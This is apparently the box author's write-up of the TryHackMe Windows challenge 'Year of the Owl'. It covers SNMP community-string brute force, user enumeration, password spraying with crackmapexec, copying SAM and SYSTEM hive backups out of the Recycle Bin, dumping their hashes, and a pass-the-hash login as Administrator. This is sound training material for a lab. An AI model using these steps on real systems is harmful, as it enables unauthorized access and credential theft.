Year of the Owl — Write-up

TryHackMe Challenge Link: https://tryhackme.com/room/yearoftheowl



Year of the Owl follows on from Year of the Dog as the next in the New Year series. It is the first Windows box in the series, and is currently rated hard. Like many of my other boxes, Year of the Owl is inactively themed — kudos if you can guess what it’s based on! As my first Windows box, you can think of Year of the Owl as being something of a warm-up (hence the initial rating of Easy/Medium), so keep an eye out for harder Windows challenges coming soon!

Let’s get started.


Enumeration

As always, we begin with an nmap scan:

nmap -p- -vv -T5 -Pn <MACHINE-IP> -oG initial-scan
80/tcp open http syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
443/tcp open https syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3306/tcp open mysql syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5357/tcp open wsdapi syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
[Screenshot: Open Ports, as in the listing above]

We have a bunch of ports to play with here, but first up, we can make an informed assumption that this is a Windows box from the RDP and WinRM services, as well as the lack of response to ICMP packets (hence the -Pn in the nmap command), which suggests the default Windows Defender Firewall is in place.

Before we go any further, let’s follow up with a service scan, just to be sure:

nmap -p 80,139,443,445,3306,3389,5357,5985,47001 -vv -sV -oN common-scan <MACHINE-IP>
80/tcp open http syn-ack ttl 127 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
443/tcp open ssl/ssl syn-ack ttl 127 Apache httpd (SSL-only mode)
445/tcp open microsoft-ds? syn-ack ttl 127
3306/tcp open mysql? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
[Screenshot: Services, as in the listing above]

Nothing unusual there.

Usually here the webserver would be the most obvious vector to attack. I happen to know that there’s nothing intentionally vulnerable there — or indeed, anywhere here.

For that matter, I have yet to find a way for nmap to discover the service, making this a devil of a foothold — a true shot in the dark.

There is an SNMP server running on UDP port 161. This will give us a tonne of information about the machine.


SNMP

SNMP: The Simple Network Management Protocol. This can provide a wealth of information about our target.

First things first, we need to discover the “Community String” that SNMP is using as its authentication credential. To do this we use a tool called onesixtyone:

onesixtyone <MACHINE-IP> -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt

This successfully brute-forces the community string of the server:

[Screenshot: Community string brute-forced (string itself blurred)]

Inside the square brackets (blurred) is our community string. Let’s use this to access information from the SNMP server.

To do this we could use a tool such as snmp-check, which would dump everything automatically; but that’s no fun. Let’s do this manually using snmpwalk. The information stored by SNMP is arranged as a “tree”, and an Object Identifier (OID) is read from left to right as a path through it. For example, for the OID 1.3.2, you would start at node one, then select the third of its child nodes from the left, and of that node’s children, you would select the second from the left.

[Diagram: SNMP example, the path through the tree to node 1.3.2]

The OID under which Windows exposes its local user list (the user table of the LanManager MIB) is 1.3.6.1.4.1.77.1.2.25, making our snmpwalk command:

snmpwalk -c <COMMUNITY> -v1 <MACHINE-IP> 1.3.6.1.4.1.77.1.2.25
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
iso.3.6.1.4.1.77.1.2.25.1.1.6.74.97.114.101.116.104 = STRING: "Jareth"
iso.3.6.1.4.1.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"
iso.3.6.1.4.1.77.1.2.25.1.1.14.68.101.102.97.117.108.116.65.99.99.111.117.110.116 = STRING: "DefaultAccount"
iso.3.6.1.4.1.77.1.2.25.1.1.18.87.68.65.71.85.116.105.108.105.116.121.65.99.99.111.117.110.116 = STRING: "WDAGUtilityAccount"

This output is slightly confusing, but in essence, we have 5 accounts. The trailing numbers in each OID are the row index of the table: the length of the username followed by its ASCII byte values (so 5.71.117.101.115.116 spells out “Guest”), which is why each name appears twice. Of these accounts, only one (Jareth) is not a default Windows account, so let’s focus on this account from here on out.
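The decoding described above, as an added example (not code from the write-up or from snmpwalk itself): it parses the snmpwalk lines, rebuilds each username from the length-prefixed byte index on the OID, checks that this agrees with the STRING value the agent reported, and lists the accounts that are not built-in Windows accounts. The sample input is the output above, embedded as a constructed string; the set of default account names is an assumption for a stock Windows install.

```python
"""Decode the svUserName rows that snmpwalk returns for a Windows host."""
import re

# svUserName column of the LanManager MIB user table. Each row is indexed by
# the username itself: its length, then its ASCII bytes, appended to this OID.
SV_USER_NAME_OID = "1.3.6.1.4.1.77.1.2.25.1.1"

# Built-in accounts on a stock Windows 10 / Server install (assumption: treat
# anything else as worth a closer look).
DEFAULT_ACCOUNTS = {"Administrator", "Guest", "DefaultAccount", "WDAGUtilityAccount"}

# Constructed sample: the lines the snmpwalk command above printed.
SAMPLE_WALK = """\
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
iso.3.6.1.4.1.77.1.2.25.1.1.6.74.97.114.101.116.104 = STRING: "Jareth"
iso.3.6.1.4.1.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"
iso.3.6.1.4.1.77.1.2.25.1.1.14.68.101.102.97.117.108.116.65.99.99.111.117.110.116 = STRING: "DefaultAccount"
iso.3.6.1.4.1.77.1.2.25.1.1.18.87.68.65.71.85.116.105.108.105.116.121.65.99.99.111.117.110.116 = STRING: "WDAGUtilityAccount"
"""

LINE_RE = re.compile(r'^(?P<oid>\S+) = STRING: "(?P<value>[^"]*)"$')


def decode_index(oid: str) -> str:
    """Turn the row index of an svUserName OID back into the username.

    snmpwalk prints the root arc as "iso" rather than "1", so that is
    normalised first. The index is <length>.<byte>.<byte>..., and the
    length is checked against the number of bytes that follow.
    """
    if oid.startswith("iso."):
        oid = "1." + oid[len("iso."):]
    if not oid.startswith(SV_USER_NAME_OID + "."):
        raise ValueError(f"not an svUserName OID: {oid}")
    index = [int(part) for part in oid[len(SV_USER_NAME_OID) + 1:].split(".")]
    length, data = index[0], index[1:]
    if length != len(data):
        raise ValueError(f"index length {length} does not match {len(data)} bytes")
    return bytes(data).decode("ascii")


def parse_walk(text: str) -> list[tuple[str, str]]:
    """Return (decoded_index, reported_value) pairs for every svUserName line."""
    rows = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if match:
            rows.append((decode_index(match["oid"]), match["value"]))
    return rows


def non_default_users(text: str) -> list[str]:
    """Accounts exposed over SNMP that are not built-in Windows accounts.

    The decoded index and the STRING value must agree; a mismatch means the
    output was mangled, so it is reported rather than silently trusted.
    """
    users = []
    for decoded, reported in parse_walk(text):
        if decoded != reported:
            raise ValueError(f"index {decoded!r} disagrees with value {reported!r}")
        if reported not in DEFAULT_ACCOUNTS:
            users.append(reported)
    return users


if __name__ == "__main__":
    for name, _ in parse_walk(SAMPLE_WALK):
        print(f"{name:20} {'default' if name in DEFAULT_ACCOUNTS else 'NOT default'}")
    print("worth investigating:", non_default_users(SAMPLE_WALK))
```

The same check is useful from the defensive side: running it against a walk of your own hosts shows exactly which account names a read-only community string hands to anyone who can reach UDP 161.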


Foothold — Jareth

We have a username, but we don’t have a password. Evaluation of the other available services doesn’t reveal anything, so we’re stuck with bruteforcing… or OSINT.

Our first bet is obviously OSINT. This is a rather unusual name, so stick it into Google and see what comes up!

Cursory research reveals that Jareth is the name of the primary antagonist in the 1986 film: Labyrinth. Further research reveals that he is mildly obsessed with the female protagonist. This allows us to guess Jareth’s password without undue difficulty.

That said, we may as well also do the bruteforce, just for the practice:

Let’s use our trusty friend, crackmapexec. We have no guarantee that our user has access to WinRM, so we’ll stick with SMB for now, then see what else we can access:

crackmapexec smb <MACHINE-IP> -u Jareth -p /usr/share/wordlists/rockyou.txt

After a few minutes, we get our answer. We are met with errors when attempting to log in over RDP, so we instead try WinRM using evil-winrm, and are able to grab the flag in user.txt:

evil-winrm -u Jareth -p <PASSWORD> -i <MACHINE-IP>
[Screenshot: Logging in over WinRM and taking the user flag (flag itself blurred)]

Privesc

The privesc for this box is made rather harder by the fact that there is antivirus software alive and kicking on the system. This prevents us from using things like winPEAS, which would have been ideal. We could use a PowerShell script such as PowerUp.ps1; this will at least execute, but the AV still prevents it from providing any useful information.

We’re doing this manually.

Thinking about the differences between Windows and Unix: how does each operating system handle a deletion request?

Answer — on Unix it’s a direct unlink with no easy method of recovery. On Windows, the file is unlinked from its original location, but an entry is kept in the Recycle Bin until the file itself is overwritten, i.e. deleted files are very easy to recover.

This would be trivial if we had GUI access; however, as it is, we’re stuck in the CLI. After messing around during development of this box, I found that the recycled files of each user can be found at C:\$Recycle.bin\<SID>, where <SID> is the security identifier of the user the bin belongs to.

Without administrator access we can’t look inside anyone else’s bin directory, so let’s focus on our own.

whoami /all | Select-String -Pattern "jareth" -Context 2,0

This searches the whoami /all output for the line containing our SID:

year-of-the-owl\jareth S-1-5-21-1987495829-1628902820-919763334-1001
[Screenshot: Obtaining the SID with the above command]

With this, we can now navigate to the Recycle Bin and take a look:

cd 'C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001'
[Screenshot: Contents of Jareth’s Recycle Bin, showing backups of the SAM and SYSTEM hives]

Yes, there are backups of the SAM and SYSTEM registry hives here, meaning we have everything we need for the classic privesc of using these to dump the password hashes of every user account on the system.

Dumping Hashes

First we need to download these files. Fortunately evil-winrm has a download command for just this purpose. Unfortunately, it won’t work while they’re in the Recycle Bin, so we first copy them to a temp location:

copy sam.bak C:\Windows\Temp\sam.bak
copy system.bak C:\Windows\Temp\system.bak
download C:\Windows\Temp\sam.bak
download C:\Windows\Temp\system.bak
[Screenshot: Downloading the hive backups with the above commands]

Switching back to our attacking machine, we can use a tool called pwdump.py to combine the two files (the SYSTEM hive holds the boot key needed to decrypt the SAM), giving us the password hashes of every local account.

We first need to clone the creddump7 repository and install pycrypto with python2:

git clone https://github.com/Neohapsis/creddump7 && cd creddump7
python2 -m pip install pycrypto

Then we can use pwdump.py to get our hashes:

python2 pwdump.py <PATH-TO-SYSTEM-FILE> <PATH-TO-SAM-FILE>
[Screenshot: Using pwdump.py (relevant hash blurred)]

Here we have the NT and LM hashes of all user accounts on the system, one per line in the format username:RID:LM-hash:NT-hash:::. We are, of course, most interested in the Administrator account:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::

Gaining Access

Using the redacted hash, we can attempt a variety of things. The most obvious thing to try would be cracking the hash to obtain a password with which we can log in. This will not work.

Instead, let’s use the hash in a Pass-The-Hash attack over WinRM to gain access to the administrator account:

evil-winrm -u Administrator -H <HASH> -i <MACHINE-IP>
[Screenshot: Obtaining admin.txt after logging in as Administrator with a Pass-The-Hash attack (flag obscured)]

And there we have it — one box successfully, if abruptly, compromised. We have obtained full Administrator access, and taken our last flag.


Footnote

As mentioned at the start of this writeup, Year of the Owl is my first Windows box, so if you happen to have found something unintended, please let me know! I hope that this box was enjoyable, and with any luck, informative. If so, please keep an eye out for more in the future!
